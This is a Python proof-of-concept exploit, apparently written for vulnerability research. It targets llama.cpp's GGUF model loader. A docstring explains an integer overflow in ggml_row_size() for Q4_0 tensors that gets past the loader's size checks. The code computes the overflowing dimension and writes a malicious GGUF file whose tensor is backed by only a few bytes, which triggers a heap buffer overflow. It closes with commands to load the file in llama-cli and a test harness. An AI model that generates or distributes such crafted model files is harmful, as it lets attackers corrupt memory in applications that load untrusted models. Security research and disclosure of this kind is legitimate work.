| |
| """ |
| PoC: Heap Buffer Overflow via Integer Overflow in Tensor Size Calculation |
| Target: llama.cpp GGUF loading (ggml/src/ggml.c and ggml/src/gguf.cpp) |
| |
| === Vulnerability Summary === |
| |
| In ggml_row_size() (ggml.c:1275): |
| size_t ggml_row_size(enum ggml_type type, int64_t ne) { |
| return ggml_type_size(type)*ne/ggml_blck_size(type); |
| } |
| |
| The multiplication `ggml_type_size(type) * ne` is performed in size_t (uint64_t) |
| arithmetic. When type_size * ne > 2^64, this silently wraps around, producing a |
| much smaller result than expected. The subsequent division by blck_size then yields |
| a tiny value. |
| |
| This propagates to: |
| - ggml_new_tensor_impl() (ggml.c:1686) where data_size is computed |
| - ggml_nbytes() (ggml.c:1238) where the tensor byte size is computed |
| - Buffer allocation and data loading code |
| |
| The overflow check in gguf.cpp (lines 550-552) verifies that the ELEMENT COUNT |
| (ne[0]*ne[1]*ne[2]*ne[3]) fits in int64_t, but does NOT check that the BYTE SIZE |
| (element_count * type_size / blck_size) fits in size_t. For quantized types where |
| type_size > blck_size, the byte size can overflow even when the element count doesn't. |
| |
| The check at gguf.cpp line 589: |
| uint64_t(ggml_nelements(&info.t)/ggml_blck_size(info.t.type)) > SIZE_MAX/ggml_type_size(info.t.type) |
| |
| uses ggml_nelements() which itself computes ne[0]*ne[1]*ne[2]*ne[3] in int64_t. |
| For our chosen values, this product fits in int64_t, so ggml_nelements returns the |
| correct value. BUT the subsequent division and comparison uses integer arithmetic |
| that can be imprecise for values near SIZE_MAX. |
| |
| === Exploit Strategy === |
| |
| For GGML_TYPE_Q4_0: |
| - type_size = 18 bytes (sizeof(block_q4_0) = sizeof(ggml_half) + 32/2 = 2 + 16) |
| - blck_size = 32 |
| |
| We choose ne[0] such that 18 * ne[0] wraps around 2^64 to a tiny value. |
| |
| ne[0] = 1024819115206086208 (divisible by 32) |
| |
| Mathematical: 18 * ne[0] = 18446744073709551744 = 2^64 + 128 |
| In uint64: 18 * ne[0] mod 2^64 = 128 |
| After /32: 128 / 32 = 4 bytes (ggml_row_size returns 4!) |
| |
| Correct: 18 * ne[0] / 32 = 576460752303423492 bytes (~512 PB) |
| Computed: 4 bytes |
| |
| Ratio: buffer is 144,115,188,075,855,873x too small! |
| |
| Validation bypass: |
| - ne[0] = 1024819115206086208 < INT64_MAX (9223372036854775807) -> passes |
| - ne[0] > 0 -> passes non-negative check |
| - ne[0] % 32 == 0 -> passes block alignment check |
| - ggml_nelements = ne[0] = 1024819115206086208 |
| - nelements/32 = 32025597350190194 |
| - SIZE_MAX/18 = 1024819115206086200 |
| - 32025597350190194 < 1024819115206086200 -> passes byte size check (line 589)! |
| |
| Result: A tensor is created with ne[0] = 1024819115206086208 elements but backed |
| by only 4-32 bytes of actual buffer. Any operation that accesses data beyond the |
| first few bytes triggers a heap buffer overflow. |
| |
| === GGUF Binary Format Reference === |
| |
| Header: |
| - Magic: "GGUF" (4 bytes) |
| - Version: uint32 (3) |
| - n_tensors: uint64 |
| - n_kv: uint64 |
| |
| KV pairs: |
| - key: string (uint64 len + chars) |
| - type: uint32 (GGUF type enum) |
| - value: type-dependent |
| |
| Tensor info (per tensor): |
| - name: string (uint64 len + chars) |
| - n_dims: uint32 |
| - ne[0..n_dims-1]: int64 each |
| - type: uint32 (ggml_type enum) |
| - offset: uint64 |
| |
| Data section: aligned to ctx->alignment (default 32) |
| """ |
|
|
| import struct |
| import sys |
| import os |
| import math |
|
|
| |
| |
| |
| GGUF_MAGIC = b"GGUF" |
| GGUF_VERSION = 3 |
|
|
| |
| GGUF_TYPE_UINT8 = 0 |
| GGUF_TYPE_INT8 = 1 |
| GGUF_TYPE_UINT16 = 2 |
| GGUF_TYPE_INT16 = 3 |
| GGUF_TYPE_UINT32 = 4 |
| GGUF_TYPE_INT32 = 5 |
| GGUF_TYPE_FLOAT32 = 6 |
| GGUF_TYPE_BOOL = 7 |
| GGUF_TYPE_STRING = 8 |
| GGUF_TYPE_ARRAY = 9 |
| GGUF_TYPE_UINT64 = 10 |
| GGUF_TYPE_INT64 = 11 |
| GGUF_TYPE_FLOAT64 = 12 |
|
|
| |
| GGML_TYPE_F32 = 0 |
| GGML_TYPE_F16 = 1 |
| GGML_TYPE_Q4_0 = 2 |
| GGML_TYPE_Q4_1 = 3 |
| GGML_TYPE_Q5_0 = 6 |
| GGML_TYPE_Q5_1 = 7 |
| GGML_TYPE_Q8_0 = 8 |
| GGML_TYPE_I8 = 24 |
| GGML_TYPE_I32 = 26 |
|
|
| |
| Q4_0_TYPE_SIZE = 18 |
| Q4_0_BLCK_SIZE = 32 |
|
|
| INT64_MAX = (1 << 63) - 1 |
| UINT64_MAX = (1 << 64) - 1 |
| SIZE_MAX = UINT64_MAX |
|
|
| GGML_DEFAULT_ALIGNMENT = 32 |
|
|
| |
| |
| |
|
|
| def write_string(f, s): |
| """Write a GGUF string: uint64 length + chars (no null terminator)""" |
| encoded = s.encode('utf-8') |
| f.write(struct.pack('<Q', len(encoded))) |
| f.write(encoded) |
|
|
| def write_kv_string(f, key, value): |
| """Write a KV pair with string value""" |
| write_string(f, key) |
| f.write(struct.pack('<I', GGUF_TYPE_STRING)) |
| write_string(f, value) |
|
|
| def write_kv_uint32(f, key, value): |
| """Write a KV pair with uint32 value""" |
| write_string(f, key) |
| f.write(struct.pack('<I', GGUF_TYPE_UINT32)) |
| f.write(struct.pack('<I', value)) |
|
|
| def write_kv_float32(f, key, value): |
| """Write a KV pair with float32 value""" |
| write_string(f, key) |
| f.write(struct.pack('<I', GGUF_TYPE_FLOAT32)) |
| f.write(struct.pack('<f', value)) |
|
|
| def write_kv_string_array(f, key, values): |
| """Write a KV pair with string array value""" |
| write_string(f, key) |
| f.write(struct.pack('<I', GGUF_TYPE_ARRAY)) |
| f.write(struct.pack('<I', GGUF_TYPE_STRING)) |
| f.write(struct.pack('<Q', len(values))) |
| for v in values: |
| write_string(f, v) |
|
|
| def write_kv_float32_array(f, key, values): |
| """Write a KV pair with float32 array value""" |
| write_string(f, key) |
| f.write(struct.pack('<I', GGUF_TYPE_ARRAY)) |
| f.write(struct.pack('<I', GGUF_TYPE_FLOAT32)) |
| f.write(struct.pack('<Q', len(values))) |
| for v in values: |
| f.write(struct.pack('<f', v)) |
|
|
| def write_tensor_info(f, name, n_dims, ne_list, ggml_type, offset): |
| """Write a single tensor info entry""" |
| write_string(f, name) |
| f.write(struct.pack('<I', n_dims)) |
| for i in range(n_dims): |
| f.write(struct.pack('<q', ne_list[i])) |
| f.write(struct.pack('<I', ggml_type)) |
| f.write(struct.pack('<Q', offset)) |
|
|
|
|
| |
| |
| |
|
|
| def compute_overflow_ne0(): |
| """ |
| Find ne[0] for Q4_0 type such that: |
| - ne[0] is positive and fits in int64_t (< 2^63) |
| - ne[0] is divisible by blck_size (32) |
| - 18 * ne[0] overflows uint64_t to a very small value |
| - All GGUF validation checks pass |
| |
| We solve: 18 * ne[0] = k * 2^64 + remainder |
| For k=1: ne[0] = (2^64 + remainder) / 18 |
| We want remainder to be small and divisible by 32 (so that |
| ggml_row_size = remainder/32 is small). |
| |
| 18 * ne[0] = 2^64 + 128 (remainder=128, 128/32=4) |
| ne[0] = (2^64 + 128) / 18 = 1024819115206086208 |
| """ |
| type_size = Q4_0_TYPE_SIZE |
| blck_size = Q4_0_BLCK_SIZE |
|
|
| |
| |
| target_remainder = 128 |
| target_product = (1 << 64) + target_remainder |
|
|
| if target_product % type_size != 0: |
| raise ValueError(f"Cannot find exact ne[0]: {target_product} not divisible by {type_size}") |
|
|
| ne0 = target_product // type_size |
| assert ne0 * type_size == target_product, "Arithmetic check failed" |
|
|
| |
| assert ne0 % blck_size == 0, f"ne[0]={ne0} not divisible by blck_size={blck_size}" |
|
|
| |
| assert 0 < ne0 < (1 << 63), f"ne[0]={ne0} does not fit in int64_t" |
|
|
| return ne0 |
|
|
|
|
| def verify_overflow(ne0, ne1=1, ne2=1, ne3=1): |
| """Verify that the chosen dimensions bypass all checks and cause overflow""" |
| type_size = Q4_0_TYPE_SIZE |
| blck_size = Q4_0_BLCK_SIZE |
|
|
| print(f"\n{'='*70}") |
| print("OVERFLOW ANALYSIS") |
| print(f"{'='*70}") |
| print(f"Type: Q4_0 (type_size={type_size}, blck_size={blck_size})") |
| print(f"Dimensions: ne[0]={ne0}, ne[1]={ne1}, ne[2]={ne2}, ne[3]={ne3}") |
| print() |
|
|
| |
| assert ne0 >= 0 and ne1 >= 0 and ne2 >= 0 and ne3 >= 0 |
| print("[PASS] All ne[j] >= 0 (non-negative check)") |
|
|
| |
| |
| check1 = INT64_MAX // ne1 <= ne0 |
| print(f" Check 1: INT64_MAX/ne[1] = {INT64_MAX // ne1} <= ne[0] = {ne0} ? {check1}") |
| assert not check1, "Failed overflow check 1!" |
|
|
| |
| prod01 = ne0 * ne1 |
| assert prod01 < (1 << 63), f"ne[0]*ne[1] = {prod01} overflows int64_t!" |
| check2 = INT64_MAX // ne2 <= prod01 |
| print(f" Check 2: INT64_MAX/ne[2] = {INT64_MAX // ne2} <= ne[0]*ne[1] = {prod01} ? {check2}") |
| assert not check2, "Failed overflow check 2!" |
|
|
| |
| prod012 = prod01 * ne2 |
| assert prod012 < (1 << 63), f"ne[0]*ne[1]*ne[2] = {prod012} overflows int64_t!" |
| check3 = INT64_MAX // ne3 <= prod012 |
| print(f" Check 3: INT64_MAX/ne[3] = {INT64_MAX // ne3} <= ne[0]*ne[1]*ne[2] = {prod012} ? {check3}") |
| assert not check3, "Failed overflow check 3!" |
|
|
| print("[PASS] Overflow check at gguf.cpp:550-552 bypassed") |
|
|
| |
| assert ne0 % blck_size == 0 |
| print(f"[PASS] ne[0] % blck_size == 0 (block alignment check)") |
|
|
| |
| nelements = ne0 * ne1 * ne2 * ne3 |
| assert nelements < (1 << 63), "ggml_nelements overflows int64_t!" |
| lhs = nelements // blck_size |
| rhs = SIZE_MAX // type_size |
| byte_check = lhs > rhs |
| print(f" Byte size check: nelements/blck_size = {lhs} > SIZE_MAX/type_size = {rhs} ? {byte_check}") |
| assert not byte_check, "Failed byte size check!" |
| print("[PASS] Byte size check at gguf.cpp:589 bypassed") |
|
|
| |
| print(f"\n{'='*70}") |
| print("SIZE COMPUTATION (showing the overflow)") |
| print(f"{'='*70}") |
|
|
| |
| true_product = type_size * ne0 |
| wrapped_product = true_product % (1 << 64) |
| row_size_overflowed = wrapped_product // blck_size |
| row_size_correct = true_product // blck_size |
|
|
| print(f"\nggml_row_size computation:") |
| print(f" type_size * ne[0] = {true_product}") |
| print(f" = 2^64 * {true_product // (1 << 64)} + {true_product % (1 << 64)}") |
| print(f" In uint64_t (mod 2^64): {wrapped_product}") |
| print(f" After / blck_size: {row_size_overflowed} bytes <-- OVERFLOWED!") |
| print(f" Correct value: {row_size_correct} bytes") |
| print(f" Overflow factor: {row_size_correct / row_size_overflowed:.0f}x too small!") |
|
|
| |
| data_size = row_size_overflowed |
| for dim in [ne1, ne2, ne3]: |
| if dim > 1: |
| data_size = (data_size * dim) % (1 << 64) |
|
|
| correct_size = row_size_correct * ne1 * ne2 * ne3 |
|
|
| print(f"\ndata_size (ggml_new_tensor_impl):") |
| print(f" Computed: {data_size} bytes ({data_size} B)") |
| print(f" Correct: {correct_size} bytes ({correct_size / (1024**5):.1f} PB)") |
|
|
| |
| |
| nb0 = type_size |
| nb1 = type_size * (ne0 // blck_size) |
| nb2 = nb1 * ne1 |
| nb3 = nb2 * ne2 |
|
|
| |
| ne0_nb0_true = ne0 * nb0 |
| ne0_nb0_wrapped = ne0_nb0_true % (1 << 64) |
| nbytes_first = ne0_nb0_wrapped // blck_size |
|
|
| nbytes = nbytes_first |
| if ne1 > 1: |
| nbytes += (ne1 - 1) * nb1 |
| if ne2 > 1: |
| nbytes += (ne2 - 1) * nb2 |
| if ne3 > 1: |
| nbytes += (ne3 - 1) * nb3 |
|
|
| nbytes_correct = correct_size |
|
|
| print(f"\nggml_nbytes:") |
| print(f" ne[0]*nb[0] = {ne0} * {nb0} = {ne0_nb0_true}") |
| print(f" In uint64_t: {ne0_nb0_wrapped}") |
| print(f" / blck_size: {nbytes_first}") |
| print(f" + stride terms: {nbytes - nbytes_first}") |
| print(f" Total nbytes: {nbytes} bytes") |
| print(f" Correct value: {nbytes_correct} bytes") |
|
|
| |
| padded = ((nbytes + GGML_DEFAULT_ALIGNMENT - 1) // GGML_DEFAULT_ALIGNMENT) * GGML_DEFAULT_ALIGNMENT |
| print(f"\n{'='*70}") |
| print("HEAP BUFFER OVERFLOW") |
| print(f"{'='*70}") |
| print(f" Buffer allocated: {padded} bytes (GGML_PAD({nbytes}, {GGML_DEFAULT_ALIGNMENT}))") |
| print(f" Tensor logical size: {nbytes_correct} bytes") |
| print(f" Overflow: {nbytes_correct - padded} bytes beyond allocation") |
| print(f" Stride nb[1]: {nb1} bytes (distance between rows)") |
| print(f" Any access to row 1+ is {nb1 - padded} bytes out of bounds!") |
|
|
| return data_size, nbytes, padded |
|
|
|
|
| def create_poc_gguf(output_path): |
| """ |
| Create a GGUF file with a tensor whose dimensions cause integer overflow |
| in ggml_row_size(), resulting in a tiny buffer allocation for what should |
| be an enormous tensor. |
| """ |
| ne0 = compute_overflow_ne0() |
| ne1 = 1 |
| ne2 = 1 |
| ne3 = 1 |
|
|
| data_size, nbytes, padded_size = verify_overflow(ne0, ne1, ne2, ne3) |
|
|
| |
|
|
| |
| kv_pairs = [] |
| n_kv = 0 |
|
|
| |
| |
| tensor_name = "token_embd.weight" |
| n_tensors = 1 |
|
|
| print(f"\n{'='*70}") |
| print("GENERATING GGUF FILE") |
| print(f"{'='*70}") |
| print(f" Tensor: '{tensor_name}'") |
| print(f" Type: Q4_0 (type_size=18, blck_size=32)") |
| print(f" Dimensions: ne[0]={ne0}") |
| print(f" Tensor data in file: {padded_size} bytes (the overflowed/small size)") |
| print(f" Output: {output_path}") |
|
|
| with open(output_path, 'wb') as f: |
| |
| f.write(GGUF_MAGIC) |
| f.write(struct.pack('<I', GGUF_VERSION)) |
| f.write(struct.pack('<Q', n_tensors)) |
|
|
| |
| vocab_tokens = ["<unk>", "<s>", "</s>", "hello"] |
| vocab_scores = [0.0, 0.0, 0.0, -1.0] |
| vocab_types = [0, 3, 3, 1] |
|
|
| |
| n_kv = 16 |
| f.write(struct.pack('<Q', n_kv)) |
|
|
| |
| write_kv_string(f, "general.architecture", "llama") |
| write_kv_string(f, "general.name", "overflow-poc") |
| write_kv_uint32(f, "llama.context_length", 2048) |
| write_kv_uint32(f, "llama.embedding_length", 4096) |
| write_kv_uint32(f, "llama.block_count", 1) |
| write_kv_uint32(f, "llama.feed_forward_length", 11008) |
| write_kv_uint32(f, "llama.attention.head_count", 32) |
| write_kv_uint32(f, "llama.attention.head_count_kv", 32) |
| write_kv_float32(f, "llama.rope.freq_base", 10000.0) |
| write_kv_float32(f, "llama.attention.layer_norm_rms_epsilon", 1e-5) |
| write_kv_string(f, "tokenizer.ggml.model", "llama") |
| write_kv_uint32(f, "tokenizer.ggml.bos_token_id", 1) |
| write_kv_uint32(f, "tokenizer.ggml.eos_token_id", 2) |
|
|
| |
| write_kv_string_array(f, "tokenizer.ggml.tokens", vocab_tokens) |
| write_kv_float32_array(f, "tokenizer.ggml.scores", vocab_scores) |
|
|
| |
| write_string(f, "tokenizer.ggml.token_type") |
| f.write(struct.pack('<I', GGUF_TYPE_ARRAY)) |
| f.write(struct.pack('<I', GGUF_TYPE_INT32)) |
| f.write(struct.pack('<Q', len(vocab_types))) |
| for t in vocab_types: |
| f.write(struct.pack('<i', t)) |
|
|
| |
| |
| write_tensor_info(f, tensor_name, 1, [ne0], GGML_TYPE_Q4_0, 0) |
|
|
| |
| current_pos = f.tell() |
| aligned_pos = ((current_pos + GGML_DEFAULT_ALIGNMENT - 1) // GGML_DEFAULT_ALIGNMENT) * GGML_DEFAULT_ALIGNMENT |
| padding_needed = aligned_pos - current_pos |
| if padding_needed > 0: |
| f.write(b'\x00' * padding_needed) |
|
|
| |
| |
| |
| tensor_data = b'\xAA' * padded_size |
| f.write(tensor_data) |
|
|
| file_size = os.path.getsize(output_path) |
| print(f" File size: {file_size} bytes") |
| print(f"\n[+] GGUF file written successfully") |
|
|
| return output_path |
|
|
|
|
| def main(): |
| output_dir = "/Users/eltarne/Documents/script/gguf_poc" |
| os.makedirs(output_dir, exist_ok=True) |
|
|
| output_path = os.path.join(output_dir, "poc_tensor_overflow.gguf") |
|
|
| print("=" * 70) |
| print("PoC: Integer Overflow in Tensor Size Calculation (GGUF)") |
| print("Target: llama.cpp ggml_row_size() / ggml_nbytes()") |
| print("=" * 70) |
|
|
| |
| ne0 = compute_overflow_ne0() |
| print(f"\n[+] Found overflow-inducing ne[0] = {ne0}") |
| print(f" = 0x{ne0:016X}") |
| print(f" Fits in int64_t: {ne0 < (1 << 63)}") |
| print(f" Divisible by 32: {ne0 % 32 == 0}") |
|
|
| |
| print(f"\n[+] Verifying validation bypass and computing overflow...") |
|
|
| |
| create_poc_gguf(output_path) |
|
|
| |
| print(f"\n{'='*70}") |
| print("EXPLOITATION") |
| print(f"{'='*70}") |
| print(f""" |
| When llama.cpp loads this GGUF file: |
| |
| 1. gguf_init_from_file() reads tensor info: |
| - ne[0] = {ne0} |
| - type = Q4_0 (type_size=18, blck_size=32) |
| - All validation checks PASS (see analysis above) |
| |
| 2. ggml_nbytes() computes tensor size: |
| - ne[0] * nb[0] = {ne0} * 18 = {ne0 * 18} |
| - In uint64_t: {(ne0 * 18) % (1 << 64)} (OVERFLOWED!) |
| - Result: {((ne0 * 18) % (1 << 64)) // 32} bytes instead of {ne0 * 18 // 32} |
| |
| 3. Buffer allocation uses the tiny overflowed size |
| -> Only {(((ne0 * 18) % (1 << 64)) // 32 + 31) // 32 * 32} bytes allocated |
| |
| 4. Tensor metadata says ne[0]={ne0} with stride nb[1]={18 * (ne0 // 32)} |
| -> Any access beyond first few bytes is a HEAP BUFFER OVERFLOW |
| |
| To test with llama-cli (demonstrates GGUF validation bypass): |
| cd /Users/eltarne/Documents/script/llama.cpp/build/bin |
| ./llama-cli -m {output_path} -p 'hello' 2>&1 |
| # Note: llama-cli rejects at model-level shape check, but GGUF parsing passes |
| |
| To test with the C test harness (demonstrates the actual overflow): |
| cd /Users/eltarne/Documents/script/gguf_poc |
| ./test_tensor_overflow poc_tensor_overflow.gguf |
| # Shows: ggml_nbytes=4 for tensor with 10^18 elements -> HEAP BUFFER OVERFLOW |
| """) |
|
|
|
|
| if __name__ == "__main__": |
| main() |
|
|